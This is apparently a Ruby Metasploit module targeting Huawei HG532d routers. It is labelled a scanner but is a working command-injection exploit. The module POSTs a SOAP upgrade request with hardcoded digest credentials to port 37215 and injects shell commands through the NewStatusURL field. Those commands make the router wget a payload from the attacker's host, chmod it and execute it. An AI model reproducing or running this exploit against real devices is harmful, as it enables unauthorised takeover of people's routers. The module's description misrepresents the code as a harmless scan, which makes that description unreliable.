require "net/http"
require "uri"

class MetasploitModule < Msf::Auxiliary
    include Msf::Auxiliary::Scanner
    include Msf::Auxiliary::Report
    include Msf::Exploit::Remote::Tcp
   
    def initialize
      super(
        'Name'           => 'HUAWEI_HG532d_A1eph-0',
        'Description'    => 'This module is used to scan the target site for HUAWEI HG532d',
        'Author'         => 'H1T52{Aleph-0}',
        'License'        => MSF_LICENSE
      )
      deregister_options('SSL','VHOST','Proxies','RPORT')
      register_options(
        [
          OptString.new('RHOSTS', [true, 'The target HOST', '192.168.119.133']),
          OptString.new('RPORT', [true, 'The target PORT', '37215']),
          OptString.new('LHOSTS', [true, 'Your HOST', '192.168.119.131']),
          OptString.new('LPORT', [true, 'Your PORT', '8000']),
        ]) 
    
    end 

    def run
      cmd = "wget -g " + datastore['LHOSTS'] + " -P " + datastore['LPORT'] + " -r /tools/msf -l /msf\n"
      cmd += "chmod 777 /msf\n"
      cmd += "/msf"
      headers = {
        "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
      }
      data = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"
      url = "http://" + datastore['RHOSTS'] + ":" + datastore['RPORT'] + "/ctrlt/DeviceUpgrade_1"
      uri = URI(url)
      http = Net::HTTP.new(uri.hostname, uri.port)
      req = Net::HTTP::Post.new(uri)

      req['Authorization'] = "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
      req.body = data

      begin
        res = Net::HTTP.start(uri.hostname, uri.port) {|http|
          http.request(req)
        }
        print_error("Some errors occurs...")
      rescue Net::ReadTimeout => error
        if error.message.include? "TCPSocket:(closed)"
          print_good("Router HUAWEI HG532d series vulnerabilities are detected successfully")
        else
          print_good("Router HUAWEI HG532d series vulnerabilities were not detected successfully")
        end
      end

    end
end


